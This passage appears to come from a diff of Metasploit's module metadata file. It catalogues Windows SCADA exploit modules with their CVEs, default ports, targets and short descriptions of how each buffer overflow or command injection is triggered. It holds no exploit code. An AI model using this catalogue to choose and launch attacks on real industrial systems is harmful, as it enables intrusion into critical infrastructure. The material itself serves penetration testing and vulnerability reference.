CoDeSys CmpWebServer Stack Buffer Overflow", - "fullname": "exploit/windows/scada/codesys_web_server", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-12-02", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Celil UNUVER", - "TecR0c ", - "sinn3r ", - "Michael Coppola" - ], - "description": "This module exploits a remote stack buffer overflow vulnerability in\n 3S-Smart Software Solutions product CoDeSys Scada Web Server Version\n 1.1.9.9. This vulnerability affects versions 3.4 SP4 Patch 2 and\n earlier.", - "references": [ - "CVE-2011-5007", - "OSVDB-77387", - "URL-http://aluigi.altervista.org/adv/codesys_1-adv.txt", - "EDB-18187", - "URL-https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-336-01A", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-12-006-01" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "CoDeSys v2.3 on Windows XP SP3", - "CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/codesys_web_server.rb", - "is_install_path": true, - "ref_name": "windows/scada/codesys_web_server", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/daq_factory_bof": { - "name": "DaqFactory HMI NETB Request Overflow", - "fullname": "exploit/windows/scada/daq_factory_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-09-13", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "mr_me " - ], - "description": "This module exploits a stack buffer overflow in Azeotech's DaqFactory\n product. The specific vulnerability is triggered when sending a specially crafted\n 'NETB' request to port 20034. Exploitation of this vulnerability may take a few\n seconds due to the use of egghunter. This vulnerability was one of the 14\n releases discovered by researcher Luigi Auriemma.", - "references": [ - "CVE-2011-3492", - "OSVDB-75496", - "URL-http://aluigi.altervista.org/adv/daqfactory_1-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-264-01" - ], - "platform": "Windows", - "arch": "", - "rport": 20034, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "DAQFactory Pro 5.85 Build 1853 on Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/daq_factory_bof.rb", - "is_install_path": true, - "ref_name": "windows/scada/daq_factory_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/delta_ia_commgr_bof": { - "name": "Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow", - "fullname": "exploit/windows/scada/delta_ia_commgr_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-07-02", - "type": "exploit", - "author": [ - "ZDI", - "t4rkd3vilz", - "hubertwslin" - ], - "description": "This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial\n Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially\n crafted packets. This module has been tested successfully on Delta Electronics Delta\n Industrial Automation COMMGR 1.08 over\n Windows XP SP3,\n Windows 7 SP1, and\n Windows 8.1.", - "references": [ - "CVE-2018-10594", - "BID-104529", - "ZDI-18-586", - "ZDI-18-588", - "EDB-44965", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01" - ], - "platform": "Windows", - "arch": "", - "rport": 502, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "COMMGR 1.08 / Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/delta_ia_commgr_bof.rb", - "is_install_path": true, - "ref_name": "windows/scada/delta_ia_commgr_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/diaenergie_sqli": { - "name": "DIAEnergie SQL Injection (CVE-2024-4548)", - "fullname": "exploit/windows/scada/diaenergie_sqli", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-05-06", - "type": "exploit", - "author": [ - "Michael Heinzl", - "Tenable" - ], - "description": "SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.\n This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\\SYSTEM.", - "references": [ - "URL-https://www.tenable.com/security/research/tra-2024-13", - "CVE-2024-4548" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 928, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows_Fetch" - ], - "mod_time": "2024-08-19 22:47:19 +0000", - "path": "/modules/exploits/windows/scada/diaenergie_sqli.rb", - "is_install_path": true, - "ref_name": "windows/scada/diaenergie_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/factorylink_csservice": { - "name": "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow", - "fullname": "exploit/windows/scada/factorylink_csservice", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-03-25", - "type": "exploit", - "author": [ - "Luigi Auriemma ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found on Siemens FactoryLink 8. The\n vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message,\n the user-supplied path first gets converted to ANSI format (CodePage 0), and then\n gets handled by a logging routine where proper bounds checking is not done,\n therefore causing a stack-based buffer overflow, and results arbitrary code execution.", - "references": [ - "OSVDB-72812", - "URL-http://aluigi.altervista.org/adv/factorylink_1-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01" - ], - "platform": "Windows", - "arch": "", - "rport": 7580, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP3", - "Windows Server 2003 SP0" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/factorylink_csservice.rb", - "is_install_path": true, - "ref_name": "windows/scada/factorylink_csservice", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/factorylink_vrn_09": { - "name": "Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow", - "fullname": "exploit/windows/scada/factorylink_vrn_09", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-03-21", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "hal", - "MC " - ], - "description": "This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,\n and 8.0.1.703. By sending a specially crafted packet, an attacker may be able to\n execute arbitrary code due to the improper use of a vsprintf() function while\n processing the user-supplied text field. Originally found and posted by\n Luigi Auriemma.", - "references": [ - "OSVDB-72815", - "URL-http://aluigi.altervista.org/adv/factorylink_4-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01" - ], - "platform": "Windows", - "arch": "", - "rport": 7579, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "FactoryLink 7.5", - "FactoryLink 7.5 SP2", - "FactoryLink 8.0.1.703" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/factorylink_vrn_09.rb", - "is_install_path": true, - "ref_name": "windows/scada/factorylink_vrn_09", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/ge_proficy_cimplicity_gefebt": { - "name": "GE Proficy CIMPLICITY gefebt.exe Remote Code Execution", - "fullname": "exploit/windows/scada/ge_proficy_cimplicity_gefebt", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-01-23", - "type": "exploit", - "author": [ - "amisto0x07", - "Z0mb1E", - "juan vazquez " - ], - "description": "This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the\n CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in\n shared resources. An attacker can abuse this behavior to execute a malicious BCL and\n drop an arbitrary EXE. The last one can be executed remotely through the WebView server.\n This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded\n CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. If\n the target does not have the WebClient service enabled, an external SMB service is necessary.", - "references": [ - "CVE-2014-0750", - "ZDI-14-015", - "URL-http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)" - ], - "mod_time": "2017-09-13 22:03:34 +0000", - "path": "/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb", - "is_install_path": true, - "ref_name": "windows/scada/ge_proficy_cimplicity_gefebt", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/iconics_genbroker": { - "name": "Iconics GENESIS32 Integer Overflow Version 9.21.201.01", - "fullname": "exploit/windows/scada/iconics_genbroker", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-03-21", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Lincoln", - "corelanc0d3r " - ], - "description": "The GenBroker service on port 38080 is affected by three integer overflow\n vulnerabilities while handling opcode 0x4b0, which is caused by abusing the\n the memory allocations needed for the number of elements passed by the client.\n This results unexpected behaviors such as direct registry calls, memory location\n calls, or arbitrary remote code execution. Please note that in order to ensure\n reliability, this exploit will try to open calc (hidden), inject itself into the\n process, and then open up a shell session. Also, DEP bypass is supported.", - "references": [ - "OSVDB-72817", - "URL-http://aluigi.org/adv/genesis_4-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-080-02" - ], - "platform": "Windows", - "arch": "", - "rport": 38080, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/iconics_genbroker.rb", - "is_install_path": true, - "ref_name": "windows/scada/iconics_genbroker", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/iconics_webhmi_setactivexguid": { - "name": "ICONICS WebHMI ActiveX Buffer Overflow", - "fullname": "exploit/windows/scada/iconics_webhmi_setactivexguid", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-05-05", - "type": "exploit", - "author": [ - "Scoot Bell ", - "Blair Strang ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control.\n By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll\n fails to do any proper bounds checking before this input is copied onto the stack,\n which causes a buffer overflow, and results arbitrary code execution under the context\n of the user.", - "references": [ - "CVE-2011-2089", - "OSVDB-72135", - "URL-http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf", - "EDB-17240", - "URL-https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-080-02" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6/7/8 on Windows XP SP3", - "IE 7 on Windows Vista" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb", - "is_install_path": true, - "ref_name": "windows/scada/iconics_webhmi_setactivexguid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/igss9_igssdataserver_listall": { - "name": "7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow", - "fullname": "exploit/windows/scada/igss9_igssdataserver_listall", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-03-24", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Lincoln", - "corelanc0d3r ", - "sinn3r " - ], - "description": "This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies\n IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows to overwrite a structured exception handling record\n on the stack, allowing for unauthenticated remote code execution. Also, after the payload\n exits, IGSSdataServer.exe should automatically recover.", - "references": [ - "CVE-2011-1567", - "OSVDB-72353", - "URL-http://aluigi.altervista.org/adv/igss_2-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A" - ], - "platform": "Windows", - "arch": "", - "rport": 12401, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb", - "is_install_path": true, - "ref_name": "windows/scada/igss9_igssdataserver_listall", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/igss9_igssdataserver_rename": { - "name": "7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow", - "fullname": "exploit/windows/scada/igss9_igssdataserver_rename", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-03-24", - "type": "exploit", - "author": [ - "Luigi Auriemma ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found on 7-Technologies IGSS 9. By supplying\n a long string of data to the 'Rename' (0x02), 'Delete' (0x03), or 'Add' (0x04) command,\n a buffer overflow condition occurs in IGSSdataServer.exe while handing an RMS report,\n which results arbitrary code execution under the context of the user.\n\n The attack is carried out in three stages. The first stage sends the final payload to\n IGSSdataServer.exe, which will remain in memory. The second stage sends the Add command\n so the process can find a valid ID for the Rename command. The last stage then triggers\n the vulnerability with the Rename command, and uses an egghunter to search for the\n shellcode that we sent in stage 1. The use of egghunter appears to be necessary due to\n the small buffer size, which cannot even contain our ROP chain and the final payload.", - "references": [ - "CVE-2011-1567", - "OSVDB-72352", - "URL-http://aluigi.altervista.org/adv/igss_5-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A" - ], - "platform": "Windows", - "arch": "", - "rport": 12401, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP3", - "Windows Server 2003 SP2/R2 SP2" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb", - "is_install_path": true, - "ref_name": "windows/scada/igss9_igssdataserver_rename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/igss9_misc": { - "name": "7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities", - "fullname": "exploit/windows/scada/igss9_misc", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-03-24", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "sinn3r " - ], - "description": "This module exploits multiple vulnerabilities found on IGSS 9's Data Server and\n Data Collector services. The initial approach is first by transferring our binary\n with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send\n an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run\n that payload with a CreateProcessA() function as a new thread.", - "references": [ - "CVE-2011-1565", - "CVE-2011-1566", - "OSVDB-72354", - "OSVDB-72349", - "URL-http://aluigi.altervista.org/adv/igss_1-adv.txt", - "URL-http://aluigi.altervista.org/adv/igss_8-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A" - ], - "platform": "Windows", - "arch": "", - "rport": 0, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP", - "Windows 7", - "Windows Server 2003 / R2" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/igss9_misc.rb", - "is_install_path": true, - "ref_name": "windows/scada/igss9_misc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/igss_exec_17": { - "name": "Interactive Graphical SCADA System Remote Command Injection", - "fullname": "exploit/windows/scada/igss_exec_17", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-03-21", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC " - ], - "description": "This module abuses a directory traversal flaw in Interactive\n Graphical SCADA System v9.00. In conjunction with the traversal\n flaw, if opcode 0x17 is sent to the dc.exe process, an attacker\n may be able to execute arbitrary system commands.", - "references": [ - "CVE-2011-1566", - "OSVDB-72349", - "URL-http://aluigi.org/adv/igss_8-adv.txt" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 12397, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/igss_exec_17.rb", - "is_install_path": true, - "ref_name": "windows/scada/igss_exec_17", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/indusoft_webstudio_exec": { - "name": "InduSoft Web Studio Arbitrary Upload Remote Code Execution", - "fullname": "exploit/windows/scada/indusoft_webstudio_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-11-04", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a lack of authentication and authorization on the InduSoft\n Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to\n the filesystem, by abusing the functions provided by the software.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre\n Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows\n XP SP3 and Windows 2003 SP2.", - "references": [ - "CVE-2011-4051", - "OSVDB-77179", - "BID-50675", - "ZDI-11-330" - ], - "platform": "Windows", - "arch": "", - "rport": 4322, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP / 2003" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/indusoft_webstudio_exec.rb", - "is_install_path": true, - "ref_name": "windows/scada/indusoft_webstudio_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/moxa_mdmtool": { - "name": "MOXA Device Manager Tool 2.1 Buffer Overflow", - "fullname": "exploit/windows/scada/moxa_mdmtool", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-10-20", - "type": "exploit", - "author": [ - "Ruben Santamarta", - "MC " - ], - "description": "This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.\n When sending a specially crafted MDMGw (MDM2_Gateway) response, an\n attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-4741", - "OSVDB-69027", - "URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-301-01A" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MOXA MDM Tool 2.1" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/moxa_mdmtool.rb", - "is_install_path": true, - "ref_name": "windows/scada/moxa_mdmtool", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/mypro_cmdexe": { - "name": "mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)", - "fullname": "exploit/windows/scada/mypro_cmdexe", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-09-22", - "type": "exploit", - "author": [ - "Michael Heinzl" - ], - "description": "Authenticated Command Injection in MyPRO <= v8.28.0 from mySCADA.\n The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\\SYSTEM.", - "references": [ - "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06", - "CVE-2023-28384" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows_Fetch" - ], - "mod_time": "2024-07-25 23:54:27 +0000", - "path": "/modules/exploits/windows/scada/mypro_cmdexe.rb", - "is_install_path": true, - "ref_name": "windows/scada/mypro_cmdexe", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/mypro_mgr_cmd": { - "name": "mySCADA myPRO Manager Unauthenticated Command Injection (CVE-2024-47407)", - "fullname": "exploit/windows/scada/mypro_mgr_cmd", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-11-21", - "type": "exploit", - "author": [ - "Michael Heinzl" - ], - "description": "Unauthenticated Command Injection in MyPRO Manager <= v1.2 from mySCADA.\n The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of the myscada9 administrative user that is automatically added by the product.", - "references": [ - "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-24-326-07", - "CVE-2024-47407" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 34022, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows_Fetch" - ], - "mod_time": "2025-01-29 20:18:05 +0000", - "path": "/modules/exploits/windows/scada/mypro_mgr_cmd.rb", - "is_install_path": true, - "ref_name": "windows/scada/mypro_mgr_cmd", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/procyon_core_server": { - "name": "Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow", - "fullname": "exploit/windows/scada/procyon_core_server", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-09-08", - "type": "exploit", - "author": [ - "Knud Hojgaard ", - "mr_me " - ], - "description": "This module exploits a vulnerability in the coreservice.exe component of Proycon\n Core Server <= v1.13. While processing a password, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows to overwrite a structured exception handling\n record on the stack, allowing for unauthenticated remote code execution. Also, after the\n payload exits, Coreservice.exe should automatically recover.", - "references": [ - "CVE-2011-3322", - "OSVDB-75371", - "URL-http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow" - ], - "platform": "Windows", - "arch": "", - "rport": 23, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 - No dep bypass" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/procyon_core_server.rb", - "is_install_path": true, - "ref_name": "windows/scada/procyon_core_server", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/realwin": { - "name": "DATAC RealWin SCADA Server Buffer Overflow", - "fullname": "exploit/windows/scada/realwin", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-09-26", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.0.10.37).\n By sending a specially crafted FC_INFOTAG/SET_CONTROL packet,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-4322", - "OSVDB-48606", - "BID-31418" - ], - "platform": "Windows", - "arch": "", - "rport": 910, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/realwin.rb", - "is_install_path": true, - "ref_name": "windows/scada/realwin", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/realwin_on_fc_binfile_a": { - "name": "DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow", - "fullname": "exploit/windows/scada/realwin_on_fc_binfile_a", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-03-21", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC " - ], - "description": "This module exploits a vulnerability found in DATAC Control International RealWin\n SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE\n packet via port 910, RealWin will try to create a file (which would be saved to\n C:\\Program Files\\DATAC\\Real Win\\RW-version\\filename) by first copying the user-\n supplied filename with an inline memcpy routine without proper bounds checking, which\n results a stack-based buffer overflow, allowing arbitrary remote code execution.\n\n Tested version: 2.0 (Build 6.1.8.10)", - "references": [ - "CVE-2011-1563", - "OSVDB-72826", - "BID-46937", - "URL-http://aluigi.altervista.org/adv/realwin_5-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01" - ], - "platform": "Windows", - "arch": "", - "rport": 910, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb", - "is_install_path": true, - "ref_name": "windows/scada/realwin_on_fc_binfile_a", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/realwin_on_fcs_login": { - "name": "RealWin SCADA Server DATAC Login Buffer Overflow", - "fullname": "exploit/windows/scada/realwin_on_fcs_login", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-03-21", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC ", - "B|H " - ], - "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.1 (Build 6.0.10.10) or\n earlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN\n packet containing a long username, an attacker may be able to\n execute arbitrary code.", - "references": [ - "CVE-2011-1563", - "OSVDB-72824", - "URL-http://aluigi.altervista.org/adv/realwin_2-adv.txt", - "URL-http://www.dataconline.com/software/realwin.php", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01" - ], - "platform": "Windows", - "arch": "", - "rport": 910, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/realwin_on_fcs_login.rb", - "is_install_path": true, - "ref_name": "windows/scada/realwin_on_fcs_login", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/realwin_scpc_initialize": { - "name": "DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow", - "fullname": "exploit/windows/scada/realwin_scpc_initialize", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-10-15", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC " - ], - "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet, an attacker may be able to execute arbitrary code.", - "references": [ - "OSVDB-68812", - "CVE-2010-4142", - "URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-313-01" - ], - "platform": "Windows", - "arch": "", - "rport": 912, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/realwin_scpc_initialize.rb", - "is_install_path": true, - "ref_name": "windows/scada/realwin_scpc_initialize", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/realwin_scpc_initialize_rf": { - "name": "DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow", - "fullname": "exploit/windows/scada/realwin_scpc_initialize_rf", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-10-15", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC " - ], - "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet, an attacker may be able to execute arbitrary code.", - "references": [ - "OSVDB-68812", - "CVE-2010-4142", - "URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-313-01" - ], - "platform": "Windows", - "arch": "", - "rport": 912, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb", - "is_install_path": true, - "ref_name": "windows/scada/realwin_scpc_initialize_rf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/realwin_scpc_txtevent": { - "name": "DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow", - "fullname": "exploit/windows/scada/realwin_scpc_txtevent", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-11-18", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC " - ], - "description": "This module exploits a stack buffer overflow in 